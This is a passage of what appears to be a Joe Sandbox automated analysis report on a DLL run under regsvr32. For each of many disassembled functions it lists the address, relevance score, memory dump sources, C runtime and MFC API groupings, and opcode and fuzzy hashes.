                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1575098132-0
                                                                                                                                                                                    • Opcode ID: cfcb56500bceffba9f83b6bb62c0275a40306f319f07eb4bd22850f745fa76f9
                                                                                                                                                                                    • Instruction ID: 82aa94abd53c0c7867c73e4535b07b727d5c1a8626a3805f5fc64995b1e1639c
                                                                                                                                                                                    • Opcode Fuzzy Hash: cfcb56500bceffba9f83b6bb62c0275a40306f319f07eb4bd22850f745fa76f9
                                                                                                                                                                                    • Instruction Fuzzy Hash: C4311831303A4885FEDBEBA590A23FD6355AB8CBC4F488565B90E076D6CF28CB4C8351
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002DF04 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 200libraryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                    • API String ID: 948315288-2852464175
                                                                                                                                                                                    • Opcode ID: c69afe832209e7197b115b92659d51fd5a351f398660ad7a81c761d84901ddef
                                                                                                                                                                                    • Instruction ID: 327b86ab72ab2277384d1d78647d7f38c5b204dcab310cbb23cf6d0acfe500be
                                                                                                                                                                                    • Opcode Fuzzy Hash: c69afe832209e7197b115b92659d51fd5a351f398660ad7a81c761d84901ddef
                                                                                                                                                                                    • Instruction Fuzzy Hash: AB915C32205B8986EBA7CF05E48479973A1FB8DBD8F098135EA4D07754EF78D659C700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002B3B0 Relevance: 15.2, APIs: 10, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$Infofree$malloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1309074677-0
                                                                                                                                                                                    • Opcode ID: d32e33cb373b50f36f8293feec70b476e41735cac62ea4976435c00bbe7a0684
                                                                                                                                                                                    • Instruction ID: 5f93b81b7479e9ba13f9a0c290f20eb80cc459eb51421eff8229e06260dced09
                                                                                                                                                                                    • Opcode Fuzzy Hash: d32e33cb373b50f36f8293feec70b476e41735cac62ea4976435c00bbe7a0684
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1661E77220078486EBA79F1694803E973E5F79C7E8F18C615FA1A87BD5DF38C6498300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180019B94 Relevance: 15.2, APIs: 10, Instructions: 161COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Resource$ActiveEnable$DesktopEnabledFindFreeHookLoadLockUnhookWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3362358738-0
                                                                                                                                                                                    • Opcode ID: 60fa34771757420946e9983ccea22f371b11f3a8d39a0b55b64141bb5c0a57e3
                                                                                                                                                                                    • Instruction ID: 52166be0566d43dda5d592a2f0cd25a3687520dd580a7037915da97bc6be336a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60fa34771757420946e9983ccea22f371b11f3a8d39a0b55b64141bb5c0a57e3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B618132206F8881FBE69B66A5043EA67A1FB8DFD5F048124FE5A07795DF38C6498301
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800254EC Relevance: 15.1, APIs: 10, Instructions: 121COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 994105223-0
                                                                                                                                                                                    • Opcode ID: b911c0f937f80c98498b0c35e1d50d7124cf729e2930f9a6df7a9eef85701526
                                                                                                                                                                                    • Instruction ID: d2558625f4536da27e312436994ea541417628768afc2c2600efef46cf84f2e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: b911c0f937f80c98498b0c35e1d50d7124cf729e2930f9a6df7a9eef85701526
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC410632604B5C86EAD79F11A5583E973A2B74CBD2F59C414FA8703B55CF38C699C708
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180011364 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindLongRemove
                                                                                                                                                                                    • String ID: AfxOldWndProc423
                                                                                                                                                                                    • API String ID: 3892049428-1060338832
                                                                                                                                                                                    • Opcode ID: ca4d0c7a0ff169869cf73387494d58b2075d782dda9620e06be933ba7f1a5dea
                                                                                                                                                                                    • Instruction ID: c9b863824582c4b6d7647dbe9bdb03e297f4e7dbac6133ce0582e4e79a3f4e6d
                                                                                                                                                                                    • Opcode Fuzzy Hash: ca4d0c7a0ff169869cf73387494d58b2075d782dda9620e06be933ba7f1a5dea
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD318031214A584AEBA6DB56B8457EE6391B78DFE2F048125BD560BBA5DE3CC34EC300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001D514 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                                                                    • String ID: System
                                                                                                                                                                                    • API String ID: 46613423-3470857405
                                                                                                                                                                                    • Opcode ID: f6855d178f5945a94625b989d575cf1cedfaba3aa285da98fde11a4b6f7bd8c2
                                                                                                                                                                                    • Instruction ID: 6bad90e5acd2ce1a36507b0109169aa1d03511f5b0f547595b95e88d15e28fd9
                                                                                                                                                                                    • Opcode Fuzzy Hash: f6855d178f5945a94625b989d575cf1cedfaba3aa285da98fde11a4b6f7bd8c2
                                                                                                                                                                                    • Instruction Fuzzy Hash: DF216D35704A4886E7969B11E8147DA73A1F34CBC9F908126FA4A07754CF3CDA49CB00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800269E0 Relevance: 13.8, APIs: 11, Instructions: 90COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1012874770-0
                                                                                                                                                                                    • Opcode ID: 2838d596f790f337c48eb54575e4c116f73f610d47339ed1f1f3f9ba2d06f600
                                                                                                                                                                                    • Instruction ID: 480f9a5028e537e28b99e3ab8bd3dbf5175d970a484ea28446b5a708f4c3b717
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2838d596f790f337c48eb54575e4c116f73f610d47339ed1f1f3f9ba2d06f600
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C410F32A0264885EED7DE21C4513ED2365E78CBC5F18C435FA0E566A6CF38CA99C751
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002A01C Relevance: 13.7, APIs: 9, Instructions: 173COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3804003340-0
                                                                                                                                                                                    • Opcode ID: 65f2cf0424f7e3104c73e365b73fe46c84e099b92c87a7cba5430a12f7d0af07
                                                                                                                                                                                    • Instruction ID: 504087e924657a0bcfa27ecac2731c3ab7e97f5b3436c2a0ab2bd63155669eae
                                                                                                                                                                                    • Opcode Fuzzy Hash: 65f2cf0424f7e3104c73e365b73fe46c84e099b92c87a7cba5430a12f7d0af07
                                                                                                                                                                                    • Instruction Fuzzy Hash: AE61BC32204A888BEBA39F25D8807D977A6F74DBE8F548215FE1953BD4CF74CA488340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180021078 Relevance: 13.6, APIs: 9, Instructions: 98COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2551688548-0
                                                                                                                                                                                    • Opcode ID: 1e9fbbc3dbe57921067f085e0747a7e134988848091babb757d220db944a2a90
                                                                                                                                                                                    • Instruction ID: ec18cfeff2b3fe096ca45f69392d90378962c9c2c538fcb42e6b9c2c5225d6c9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e9fbbc3dbe57921067f085e0747a7e134988848091babb757d220db944a2a90
                                                                                                                                                                                    • Instruction Fuzzy Hash: F6418D31612A4889FAD3DB51EC813D9A3A4B79C7C9F15C025BA4D47BA6EF38C66DC304
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002E382 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _cwprintf_s_l
                                                                                                                                                                                    • String ID: %s (%s:%d)$%s (%s:%d)%s$C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl$Exception thrown in destructor$m
                                                                                                                                                                                    • API String ID: 2941638530-2286653399
                                                                                                                                                                                    • Opcode ID: f2a865bf828471275d3af9273fe5280f9a4a05953590ff50600787b0b1bae94d
                                                                                                                                                                                    • Instruction ID: 894d6bedba28786ac668ddf2e205677fe09791d4162071f201a71a6f61b38d26
                                                                                                                                                                                    • Opcode Fuzzy Hash: f2a865bf828471275d3af9273fe5280f9a4a05953590ff50600787b0b1bae94d
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5214A76240A89D6EB86DF25D8407D92361F789BD8F848016BA4D47765DF38C68DC340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002FB8C Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _cwprintf_s_l
                                                                                                                                                                                    • String ID: %s (%s:%d)$%s (%s:%d)%s$8$Exception thrown in destructor$f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
                                                                                                                                                                                    • API String ID: 2941638530-2049090729
                                                                                                                                                                                    • Opcode ID: e47fb644f89d1c5540396ebd654497df7c14707678480f34e70c810658df3cee
                                                                                                                                                                                    • Instruction ID: 4165e8df3eab90fad3419edddea937445478ec48b4668971702eb4fd3d588469
                                                                                                                                                                                    • Opcode Fuzzy Hash: e47fb644f89d1c5540396ebd654497df7c14707678480f34e70c810658df3cee
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF214A76201B49D6EB96DF25E8507E92365F788BD8F858022FA0D47765DF38C68DC340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001B48C Relevance: 12.1, APIs: 8, Instructions: 108memoryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalSection$Leave$AllocLocalValue$Enter
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2344649020-0
                                                                                                                                                                                    • Opcode ID: a71c1a953a4658dcad2fd3d96841059a19a67f7c7767339143e75915b3bdf1dc
                                                                                                                                                                                    • Instruction ID: 3ac6b84e638dcf9559a4c9cb53870d201d45975a1eb3b9efe372238c3bc65534
                                                                                                                                                                                    • Opcode Fuzzy Hash: a71c1a953a4658dcad2fd3d96841059a19a67f7c7767339143e75915b3bdf1dc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0341C032600F4897EB96CF25D4903E973A5F74CBE5F108215EA2A83794CF38DA69C340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001F370 Relevance: 12.1, APIs: 8, Instructions: 92COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2918714741-0
                                                                                                                                                                                    • Opcode ID: 5fe8c6ef0194c3ea1803748261baa358e3cb48f9a62a78d95c10b61d10b29ea6
                                                                                                                                                                                    • Instruction ID: cb3c2a7aebeefd5943992f16d8a556efa423499811155f93aa8e604d6ea879e8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5fe8c6ef0194c3ea1803748261baa358e3cb48f9a62a78d95c10b61d10b29ea6
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC418232505B488AEBF39B55A4403EEB361A79D7E4F64C611FAA9437D6CF38C6188710
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800284DC Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __doserrno_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 921712934-0
                                                                                                                                                                                    • Opcode ID: 9d939c80741d2301966f4670f951b5c28dc73e16d2268d218e037a8ca9a879d3
                                                                                                                                                                                    • Instruction ID: 9756c0223caaab29dcb060dd82a048ebe9745fef1679326519cfdf289b3ba782
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d939c80741d2301966f4670f951b5c28dc73e16d2268d218e037a8ca9a879d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: A031BC32612B6889E3936F65A8417DD7751AB89BF0FA5C715BE3907BD3CF3882168700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180028D74 Relevance: 12.1, APIs: 8, Instructions: 89COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
